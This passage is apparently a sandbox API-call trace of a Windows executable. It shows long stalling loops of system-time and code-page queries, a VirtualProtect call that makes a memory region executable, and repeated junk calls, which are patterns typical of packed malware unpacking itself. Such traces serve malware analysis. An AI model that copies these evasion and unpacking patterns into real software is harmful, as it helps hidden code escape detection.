lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.961] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.961] GetACP () returned 0x4e4 [0128.961] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.961] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.961] GetACP () returned 0x4e4 [0128.961] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.961] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.961] GetACP () returned 0x4e4 [0128.961] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.961] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.961] GetACP () returned 0x4e4 [0128.961] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.962] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.962] GetACP () returned 0x4e4 [0128.962] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.962] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.962] GetACP () returned 0x4e4 [0128.962] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.962] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.962] GetACP () returned 0x4e4 [0128.962] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.962] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.962] GetACP () returned 0x4e4 [0128.962] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.962] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.962] GetACP () returned 0x4e4 [0128.962] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.962] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.962] GetACP () returned 0x4e4 [0128.962] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.963] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.963] GetACP () returned 0x4e4 [0128.963] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.963] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.963] GetACP () returned 0x4e4 [0128.963] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.963] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.963] GetACP () returned 0x4e4 [0128.963] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.963] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.963] GetACP () returned 0x4e4 [0128.963] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.963] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.963] GetACP () returned 0x4e4 [0128.963] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.963] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.963] GetACP () returned 0x4e4 [0128.963] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.963] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.963] GetACP () returned 0x4e4 [0128.963] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.964] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.964] GetACP () returned 0x4e4 [0128.964] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.964] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.964] GetACP () returned 0x4e4 [0128.964] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.964] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.964] GetACP () returned 0x4e4 [0128.964] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.964] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.964] GetACP () returned 0x4e4 [0128.964] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.964] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.964] GetACP () returned 0x4e4 [0128.964] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.964] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.964] GetACP () returned 0x4e4 [0128.964] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.964] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.964] GetACP () returned 0x4e4 [0128.965] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.965] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.965] GetACP () returned 0x4e4 [0128.965] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.965] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.965] GetACP () returned 0x4e4 [0128.965] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.965] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.965] GetACP () returned 0x4e4 [0128.965] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.965] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.965] GetACP () returned 0x4e4 [0128.965] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.965] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.965] GetACP () returned 0x4e4 [0128.965] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.965] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.965] GetACP () returned 0x4e4 [0128.965] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.966] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.966] GetACP () returned 0x4e4 [0128.966] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.966] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.966] GetACP () returned 0x4e4 [0128.966] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.966] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.966] GetACP () returned 0x4e4 [0128.966] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.966] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.966] GetACP () returned 0x4e4 [0128.966] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.966] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.966] GetACP () returned 0x4e4 [0128.966] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.966] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.966] GetACP () returned 0x4e4 [0128.966] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.966] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.966] GetACP () returned 0x4e4 [0128.966] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.967] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.967] GetACP () returned 0x4e4 [0128.967] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.967] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.967] GetACP () returned 0x4e4 [0128.967] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.967] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.967] GetACP () returned 0x4e4 [0128.967] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.967] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.967] GetACP () returned 0x4e4 [0128.967] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.967] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.967] GetACP () returned 0x4e4 [0129.110] VirtualProtect (in: lpAddress=0x2b5ab8, dwSize=0xf2eb, flNewProtect=0x40, lpflOldProtect=0x43ad04 | out: lpflOldProtect=0x43ad04*=0x4) returned 1 [0129.110] AddAtomA (lpString=0x0) returned 0x0 [0129.111] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.111] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.111] AddAtomA (lpString=0x0) returned 0x0 [0129.111] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.111] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.111] AddAtomA (lpString=0x0) returned 0x0 [0129.111] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.111] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.111] AddAtomA (lpString=0x0) returned 0x0 [0129.111] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.111] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.111] AddAtomA (lpString=0x0) returned 0x0 [0129.111] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.111] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.111] AddAtomA (lpString=0x0) returned 0x0 [0129.111] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.111] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.111] AddAtomA (lpString=0x0) returned 0x0 [0129.111] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.112] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.112] AddAtomA (lpString=0x0) returned 0x0 [0129.112] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.112] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.112] AddAtomA (lpString=0x0) returned 0x0 [0129.112] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.112] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.112] AddAtomA (lpString=0x0) returned 0x0 [0129.112] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.112] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.112] AddAtomA (lpString=0x0) returned 0x0 [0129.112] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.112] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.112] AddAtomA (lpString=0x0) returned 0x0 [0129.112] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.112] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.112] AddAtomA (lpString=0x0) returned 0x0 [0129.112] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.112] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.112] AddAtomA (lpString=0x0) returned 0x0 [0129.112] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.112] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.112] AddAtomA (lpString=0x0) returned 0x0 [0129.112] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.113] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.113] AddAtomA (lpString=0x0) returned 0x0 [0129.113] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.113] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.113] AddAtomA (lpString=0x0) returned 0x0 [0129.113] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.113] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.113] AddAtomA (lpString=0x0) returned 0x0 [0129.113] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.113] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.113] AddAtomA (lpString=0x0) returned 0x0 [0129.113] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.113] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.113] AddAtomA (lpString=0x0) returned 0x0 [0129.113] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.113] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.113] AddAtomA (lpString=0x0) returned 0x0 [0129.113] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.113] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.113] AddAtomA (lpString=0x0) returned 0x0 [0129.113] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.113] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.113] AddAtomA (lpString=0x0) returned 0x0 [0129.113] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.113] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.113] AddAtomA (lpString=0x0) returned 0x0 [0129.113] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.114] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.114] AddAtomA (lpString=0x0) returned 0x0 [0129.114] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.114] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.114] AddAtomA (lpString=0x0) returned 0x0 [0129.114] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.114] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.114] AddAtomA (lpString=0x0) returned 0x0 [0129.114] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.114] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.114] AddAtomA (lpString=0x0) returned 0x0 [0129.114] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.114] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.114] AddAtomA (lpString=0x0) returned 0x0 [0129.114] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.114] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.114] AddAtomA (lpString=0x0) returned 0x0 [0129.114] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.114] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.114] AddAtomA (lpString=0x0) returned 0x0 [0129.114] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.114] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.114] AddAtomA (lpString=0x0) returned 0x0 [0129.114] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.115] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.115] AddAtomA (lpString=0x0) returned 0x0 [0129.115] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.115] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.115] AddAtomA (lpString=0x0) returned 0x0 [0129.115] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.115] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.115] AddAtomA (lpString=0x0) returned 0x0 [0129.115] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.115] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.115] AddAtomA (lpString=0x0) returned 0x0 [0129.115] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.115] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.115] AddAtomA (lpString=0x0) returned 0x0 [0129.115] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.115] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.115] AddAtomA (lpString=0x0) returned 0x0 [0129.115] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.115] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.115] AddAtomA (lpString=0x0) returned 0x0 [0129.115] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.115] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.115] AddAtomA (lpString=0x0) returned 0x0 [0129.115] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.115] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.116] AddAtomA (lpString=0x0) returned 0x0 [0129.116] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.116] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.116] AddAtomA (lpString=0x0) returned 0x0 [0129.116] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.116] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.116] AddAtomA (lpString=0x0) returned 0x0 [0129.116] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.116] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.116] AddAtomA (lpString=0x0) returned 0x0 [0129.116] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.116] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.116] AddAtomA (lpString=0x0) returned 0x0 [0129.116] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.116] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.116] AddAtomA (lpString=0x0) returned 0x0 [0129.116] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.116] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.116] AddAtomA (lpString=0x0) returned 0x0 [0129.116] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.116] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.116] AddAtomA (lpString=0x0) returned 0x0 [0129.116] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.116] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.117] AddAtomA (lpString=0x0) returned 0x0 [0129.117] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.117] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.117] AddAtomA (lpString=0x0) returned 0x0 [0129.117] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.117] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 